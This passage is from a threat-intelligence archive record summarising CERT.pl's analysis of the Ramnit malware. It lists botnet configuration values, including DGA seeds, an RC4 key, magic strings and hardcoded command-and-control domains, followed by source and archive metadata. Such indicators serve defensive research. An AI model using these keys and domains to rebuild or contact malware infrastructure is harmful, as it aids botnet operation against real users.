'harcoded_domain':\r\n'bungetragecomedy9238.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 697527549, 'dga_domain_no': 10, 'rc4_key': 'fenquyidh',\r\n'config_magic': 'demetra', 'md5_magic': '45Bn99gT', 'port': 443, 'harcoded_domain':\r\n'h37eyrba720ui.com',}\"\r\n\"{'config_type': 7, 'dga_seed': 742724187, 'dga_domain_no': 50, 'rc4_key': 'fenquyidh',\r\n'config_magic': 'demetra', 'md5_magic': '45Bn99gT', 'port': 443, 'harcoded_domain':\r\n'okjndyeu3017uhe.com',}\"\r\nLoader 
sha256:\r\nDGA domains for analyzed configs:\r\nSource: https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/",
	"extraction_quality": 1,
	"language": "NL",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/"
	],
	"report_names": [
		"ramnit-in-depth-analysis"
	],
	"threat_actors": [],
	"ts_created_at": 1775434783,
	"ts_updated_at": 1775826727,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/07ab2a6b2f52f1ef945158544d3b8098a2c5bd8e.pdf",
		"text": "https://archive.orkl.eu/07ab2a6b2f52f1ef945158544d3b8098a2c5bd8e.txt",
		"img": "https://archive.orkl.eu/07ab2a6b2f52f1ef945158544d3b8098a2c5bd8e.jpg"
	}
}